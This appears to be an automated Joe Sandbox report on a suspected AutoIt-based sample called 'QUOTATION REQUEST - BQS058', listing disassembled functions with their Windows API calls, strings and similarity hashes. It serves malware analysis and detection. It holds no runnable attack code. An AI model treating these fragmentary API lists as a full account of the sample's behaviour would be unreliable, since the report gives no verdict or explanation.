Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 1846db5e755ffc700e7f5037fd62dedce5a4688853b5370977f37d33239b0abc
Instruction ID: 6c6e76b3c0fdea697e0b4f544dd4cb0387356f91a7dc34d9832c67dc4150b22d
Opcode Fuzzy Hash: 1846db5e755ffc700e7f5037fd62dedce5a4688853b5370977f37d33239b0abc
Instruction Fuzzy Hash: B121B732600219AFDF11DEE8DC44CBB77ECEB09264B008165FE94DB151DA74DC418B60

Function 01046173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01047D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010461C6
WSAGetLastError.WSOCK32(00000000), ref: 010461D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0104620E
connect.WSOCK32(00000000,?,00000010), ref: 01046217
WSAGetLastError.WSOCK32 ref: 01046221
closesocket.WSOCK32(00000000), ref: 0104624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01046263

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
Instruction ID: 269e45d8f6271ff4fd8fcb59907d623d70a815278f6b5a742d197812ad53ed1f
Opcode Fuzzy Hash: cb28c5221af7b9878a6eae4e5cfe693ca7185c3170f4f49d283cbd86f25d548b
Instruction Fuzzy Hash: 4A31B571600219AFDF10AF64CCC4BBE7BADEF45710F044069FD85E7291DB79A9049B61

Function 0102F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0102F671
__wcsnicmp.LIBCMT ref: 0102F692
__wcsnicmp.LIBCMT ref: 0102F6AC

Strings

#notrayicon, xrefs: 0102F669
#OnAutoItStartRegister, xrefs: 0102F6A6
#requireadmin, xrefs: 0102F68C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 0f7afc7cc9b5f4abadf5e622978719f3c51256248f88027e8fa55ff67c3fef75
Instruction ID: bf6cb43977c94fc2915e3a8800faa8eab8ba45f299db2f18d8c7e7e040aa98cc
Opcode Fuzzy Hash: 0f7afc7cc9b5f4abadf5e622978719f3c51256248f88027e8fa55ff67c3fef75
Instruction Fuzzy Hash: 6F21497220453366D331BB38AC06EBB73E8EF593C0F044029FAC6CA162EB959D45D395

Function 0102DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0102DC2F
SysAllocString.OLEAUT32(00000000), ref: 0102DC32
SysAllocString.OLEAUT32 ref: 0102DC53
SysFreeString.OLEAUT32 ref: 0102DC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 0102DC76
SysAllocString.OLEAUT32(?), ref: 0102DC84

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 92272873977bbda9f40b1b2c8f55e0422aa9132c3952eff1c1f362851c46ec74
Instruction ID: a6085901c4bda3f986be478b1be0c05c9fcc0953fd2efdc7ef1c4ca2d364ab9f
Opcode Fuzzy Hash: 92272873977bbda9f40b1b2c8f55e0422aa9132c3952eff1c1f362851c46ec74
Instruction Fuzzy Hash: AC21A735605219AF9B11EFECDC88CAB77ECEB09360B108165F984CB255DA78DC41CB64

Function 010575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01057632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0105763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0105764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01057659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01057665

Strings

Msctls_Progress32, xrefs: 01057603

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
Instruction ID: 4507df60307cc4cb2243188bbcaba65c58b792ba0b81bf569a33c579ddce4e73
Opcode Fuzzy Hash: 348ea8257eb4d58a5183282cb3ee3a685f04327a767d904cf8981a4a3deb7c98
Instruction Fuzzy Hash: 6E11B2B2110219BFEF159F65CC85EEBBF6EFF0C798F014115BA44A6050CA72AC21DBA4

Function 00FF9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00FF9AE6

Part of subcall function 00FF3187: EncodePointer.KERNEL32(00000000), ref: 00FF318A
Part of subcall function 00FF3187: __initp_misc_winsig.LIBCMT ref: 00FF31A5
Part of subcall function 00FF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00FF9EA0
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00FF9EB4
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00FF9EC7
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FF9EDA
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FF9EED
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FF9F00
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FF9F13
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FF9F26
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FF9F39
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FF9F4C
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FF9F5F
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FF9F72
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FF9F85
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FF9F98
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FF9FAB
Part of subcall function 00FF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FF9FBE

__mtinitlocks.LIBCMT ref: 00FF9AEB
__mtterm.LIBCMT ref: 00FF9AF4

Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C56
Part of subcall function 00FF9B5C: _free.LIBCMT ref: 00FF9C5D
Part of subcall function 00FF9B5C: DeleteCriticalSection.KERNEL32(0108EC00,?,?,00FF9AF9,00FF7CD0,0108A0B8,00000014), ref: 00FF9C7F

__calloc_crt.LIBCMT ref: 00FF9B19
__initptd.LIBCMT ref: 00FF9B3B
GetCurrentThreadId.KERNEL32 ref: 00FF9B42

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
Instruction ID: 25353f68e2b6fabdb854dc9a01f9151ce7cbcc4dceaaef9f73d3f138de7eb396
Opcode Fuzzy Hash: dbd94e8cc997c9f942dba6bfe4b36cb50ba6c74740152d40305bc5b91213cdd7
Instruction Fuzzy Hash: 33F0CD3291D7191AE7347674BC07B7E36809F42B74B200A19F7A0960FAEEE9850162A4

Function 00FF406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FF3F85), ref: 00FF4085
GetProcAddress.KERNEL32(00000000), ref: 00FF408C
EncodePointer.KERNEL32(00000000), ref: 00FF4097
DecodePointer.KERNEL32(00FF3F85), ref: 00FF40B2

Strings

combase.dll, xrefs: 00FF4080
RoUninitialize, xrefs: 00FF4074

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: eb97210d8e4938d44e7333ed7fddd8339fc81d6447683d3d3b4b8410812aa2b2
Instruction ID: 0c62b58193295dd3e4870ae426df2610c78ea4855c951e4c734bc4ace63f8a0e
Opcode Fuzzy Hash: eb97210d8e4938d44e7333ed7fddd8339fc81d6447683d3d3b4b8410812aa2b2
Instruction Fuzzy Hash: BCE09AB0541301ABEB30AF71E919B173AB4BB14782F104418F5C6D90A8CF7F5500DF14

Function 010364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0103660B
_memmove.LIBCMT ref: 01036546

Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

_memmove.LIBCMT ref: 010365B9
_memmove.LIBCMT ref: 010366A0
_memmove.LIBCMT ref: 010366B9
_memmove.LIBCMT ref: 010366D5

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: db2bd71b1c6caa0d31ff397a3e613ae4fec08f3966abb6f03866039f6fd49b98
Instruction ID: 021f3a83fcda1854beca9f113fdf23e7ed7353730697c4c0325bdf044d11d5a5
Opcode Fuzzy Hash: db2bd71b1c6caa0d31ff397a3e613ae4fec08f3966abb6f03866039f6fd49b98
Instruction Fuzzy Hash: 5861063090424AABCF01FF64CC81EFE3BA9AF49308F484459FD955B2A2DB79D905EB50

Function 010501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010502BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010502FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01050320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01050349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0105038C
RegCloseKey.ADVAPI32(00000000), ref: 01050399

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 93f1d3aef7070c4cf6f55482b32f60afe1aee97d78c8e46387cbfaa809a68e42
Instruction ID: eb80c3a3717e61336409ea83aa81a3651adbb3409002298ee4fda9542ce07c1b
Opcode Fuzzy Hash: 93f1d3aef7070c4cf6f55482b32f60afe1aee97d78c8e46387cbfaa809a68e42
Instruction Fuzzy Hash: 5E512631208305AFD750EF68C885EAFBBE9EF84314F04491DF9858B2A2DB75E905DB52

Function 01055799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 010557FB
GetMenuItemCount.USER32(00000000), ref: 01055832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0105585A
GetMenuItemID.USER32(?,?), ref: 010558C9
GetSubMenu.USER32(?,?), ref: 010558D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 01055928

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 532b12776ceb62e3c8e53d5170a6195432ee61273d5bf85e5cf0b24f4df0755d
Instruction ID: 954bd4a348b650911d57c7e156534d667f705db43be94fb29e381de4f4ad8d8f
Opcode Fuzzy Hash: 532b12776ceb62e3c8e53d5170a6195432ee61273d5bf85e5cf0b24f4df0755d
Instruction Fuzzy Hash: 3F516C31E00216AFCF51EFA4CC459AEBBB5EF48720F144099ED81BB351CB79AE419B90

Function 0102EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0102EF06
VariantClear.OLEAUT32(00000013), ref: 0102EF78
VariantClear.OLEAUT32(00000000), ref: 0102EFD3
_memmove.LIBCMT ref: 0102EFFD
VariantClear.OLEAUT32(?), ref: 0102F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0102F078

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 258dc570bcb8bef85626c037a29aab94d66a518a7b23d8418bf203357d0d6a5c
Instruction ID: 9511ba63c1ed898f958e1c443bccfd0b80c1305325ab20a956ba7707fa365e90
Opcode Fuzzy Hash: 258dc570bcb8bef85626c037a29aab94d66a518a7b23d8418bf203357d0d6a5c
Instruction Fuzzy Hash: 15515C75A0021A9FDB10DF58C884AAABBF8FF4C350B158559FA89DB305E735E911CF90

Function 0103220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01032258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010322A3
IsMenu.USER32(00000000), ref: 010322C3
CreatePopupMenu.USER32 ref: 010322F7
GetMenuItemCount.USER32(000000FF), ref: 01032355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01032386

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 55de95a3a0a0f294679f3f79a1a06c1de413f1a2315d258803570a908b0c38f8
Instruction ID: ee6aedba4539353d9e1966b4fcc5fdfd2f0671a4e15b001f05aa83a779feb817
Opcode Fuzzy Hash: 55de95a3a0a0f294679f3f79a1a06c1de413f1a2315d258803570a908b0c38f8
Instruction Fuzzy Hash: FD519F7060130AEBDF21CF68D888BAEBBF9BF85318F108199E99597290D7719944CB51

Function 00FD1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00FD179A
GetWindowRect.USER32(?,?), ref: 00FD17FE
ScreenToClient.USER32(?,?), ref: 00FD181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FD182C
EndPaint.USER32(?,?), ref: 00FD1876

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 50fc7b49a8501d1103f736f67bd9f559552a15af3e8a94c03896d78bda552012
Instruction ID: 863399f2bc95f2fe84656e866fd6a7cebe5417697129b9f3f5a8a52edbb053e1
Opcode Fuzzy Hash: 50fc7b49a8501d1103f736f67bd9f559552a15af3e8a94c03896d78bda552012
Instruction Fuzzy Hash: B241B131504301AFD722DF25CC84BAB7BE9FB4A724F18066AF5948B2A1C7359905EB61

Function 0105B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(010957B0,00000000,01578A68,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B712
EnableWindow.USER32(00000000,00000000), ref: 0105B736
ShowWindow.USER32(010957B0,00000000,01578A68,?,?,010957B0,?,0105B5A8,?,?), ref: 0105B796
ShowWindow.USER32(00000000,00000004,?,0105B5A8,?,?), ref: 0105B7A8
EnableWindow.USER32(00000000,00000001), ref: 0105B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0105B7EF

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 95319d3a8c2a123f2f8a99614031e3643f970da2fac528c0048bbe8a9b5b3b93
Instruction ID: 0ef0c6a6c479215e38076f4de151c356393065ccd895d74ded93176202dc8dad
Opcode Fuzzy Hash: 95319d3a8c2a123f2f8a99614031e3643f970da2fac528c0048bbe8a9b5b3b93
Instruction Fuzzy Hash: 48412134500249AFDBA6CF28C499B967FE2FF05310F1C41E5EE888F562C735A455DB51

Function 0104709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,01044E41,?,?,00000000,00000001), ref: 010470AC

Part of subcall function 010439A0: GetWindowRect.USER32(?,?), ref: 010439B3

GetDesktopWindow.USER32 ref: 010470D6
GetWindowRect.USER32(00000000), ref: 010470DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0104710F

Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC

GetCursorPos.USER32(?), ref: 0104713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01047199

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 6aab1842f6860d021f7a6669a244a103a42c686ec404b5e98177e0ef21a4790f
Instruction ID: 4eab2b4616e2948ddf4989d858d2e7f6ef7eb3f2cf365759a7d766cbea88c929
Opcode Fuzzy Hash: 6aab1842f6860d021f7a6669a244a103a42c686ec404b5e98177e0ef21a4790f
Instruction Fuzzy Hash: 0C31A472505306ABD720DF18D848F9BBBEAFF89314F000929F5C5A7191D775EA09CB92

